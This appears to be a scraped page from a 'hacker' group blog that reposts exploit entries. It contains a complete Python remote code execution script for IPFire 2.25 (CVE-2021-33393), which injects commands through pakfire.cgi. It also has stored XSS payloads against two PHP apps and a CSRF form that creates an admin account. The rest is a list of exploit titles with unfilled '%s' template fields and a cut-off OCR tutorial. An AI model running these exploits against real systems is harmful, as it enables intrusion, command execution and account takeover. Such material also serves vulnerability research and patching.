# Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated)
# Date: 15/05/2021
# Exploit Author: Mücahit Saratar
# Vendor Homepage: https://www.ipfire.org/
# Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso
# Version: 2.25 - core update 156
# Tested on: parrot os 5.7.0-2parrot2-amd64
# CVE: CVE-2021-33393
#!/usr/bin/python3
import requests as R
import sys
import base64
try:
host = sys.argv[1]
assert host[:4] == "http" and host[-1] != "/"
url = host + "/cgi-bin/pakfire.cgi"
username = sys.argv[2]
password = sys.argv[3]
komut = sys.argv[4]
except:
print(f"{sys.argv[0]} http://target.com:444 username password command")
exit(1)
veri = {
"INSPAKS": f"7zip;{komut}",
"ACTION":"install",
"x": "10",
"y": "6" }
token = b"Basic " + base64.b64encode(f"{username}:{password}".encode())
header = {"Authorization": token,
"Connection": "close",
"Cache-Control": "max-age=0",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
"Origin": host,
"Sec-GPC": "1",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-User": "?1",
"Sec-Fetch-Dest": "document",
"Referer": host}
R.post(url, data=veri, headers=header, verify=False)
print("Done.")
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863149431
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - 'Firstname' Persistent Cross Site Scripting (Authenticated)
# Date: 14-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Linux parrot
# --- Description --- #
# The web application allows member to inject persistent Cross-Site-Scripting payload which will be executed in both member and Admin panel
# --- Proof of concept --- #
1- Create account and login as member and go to: http://localhost/APR/edit_info.php
2- Inject this payload into Firstname input : <script>alert(document.cookie)</script>
4- and fill other inputs as you want (Other inputs might be vulnerable as well) then click on Update button.
5- refresh the page and Xss popup will be triggered.
6- Now if Admin visit this page in his/her Dashboard : http://localhost/APR/admin/members.php
7- Our Xss payload will be executed on Admin Browser
** Attacker can use this vulnerability to take over Admin account **
# Exploit Title: Simple Chatbot Application 1.0 - 'Category' Stored Cross site Scripting
# Date: 16-05-2021
# Exploit Author: Vani K G
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html
# Version: 1.0
# Tested on: Windows 10/XAMPP
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the
two. It occurs when a malicious script is injected directly into a
vulnerable web application.
Attack Vector :
This vulnerability can result in the attacker to inject the XSS
payload in the Title field of the page and each time any user will
open the website, the XSS triggers and attacker can able to steal the
cookie according to the crafted payload.
Vulnerable Parameters: Settings System Info field
Payload : <script>alert(1)</script>
Vulnerable URL :
http://localhost/chatbot/admin/?page=system_info
Steps To Reproduce :
1) Go to the admin Dashboard
2) Click on Settings and Select System Info.
3) Put Payload into the System name input field.
4) Click on Save.
5) XSS payload will be triggered.
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Cross Site Request Forgery (Add Admin)
# Date: 15-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: PHP 7.4.11 , Linux x64_x86
# --- Proof of concept --- #
# Vulnerable file : http://localhost/APR/admin/user.php
# Exploit:
<html>
<head>
<title>Add Admin</title>
</head>
<body>
<h1> Absolutely Not Vulnerable Site :D </h1>
<form method="POST" action="http://127.0.0.1/APR/admin/user.php">
<input type="hidden" name="username" value="lol">
<input type="hidden" name="password" value="321" >
<button type="submit" name="submit">Click</button>
</form>
</body>
</html>

Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

EgavilanMedia PHPCRUD 1.0 - 'First Name' SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Subrion CMS 4.2.1 - Arbitrary File Upload
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

COVID19 Testing Management System 1.0 - SQL Injection (Auth Bypass)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

Spotweb 1.4.9 - DOM Based Cross-Site Scripting (XSS)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

Title: Python + Baidu OCR for image recognition
HACKER · %s · %s
Experimental Environment
Python (3.9.12) Kali Linux Baidu OCR
Apply for Baidu OCR
Visit Baidu Smart Cloud and activate API
Website: https://cloud.baidu.com/campaign/OCR202203/index.html
You can log in with your Baidu account. The advantage of using Baidu login is that you can directly migrate Baidu's real-name authentication, so you don't need to wait a few more days for manual review.
You can choose to try it for free, or buy it for 10,000 times for 1 yuan. I think there is no difference, it is all enough.
When you receive the free credit, you must check the interface type, otherwise it will be blank.
Create a new application and get token
Click Create App in the Console-Text Recognition-Overview
Select an individual for the application, and fill in the application name and overview at will
After the creation is completed, enter the application list and you can see the API Key and Secret Key, and write it down.
Text Recognition
According to the official example, a simple column of Python was written. References are as follows:
from aip import AipOcr
APP_ID='
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Microsoft Exchange 2019 - Unauthenticated Email Download
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Visual Studio Code 1.47.1 - Denial of Service (PoC)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

ManageEngine ADSelfService Plus 6.1 - CSV Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view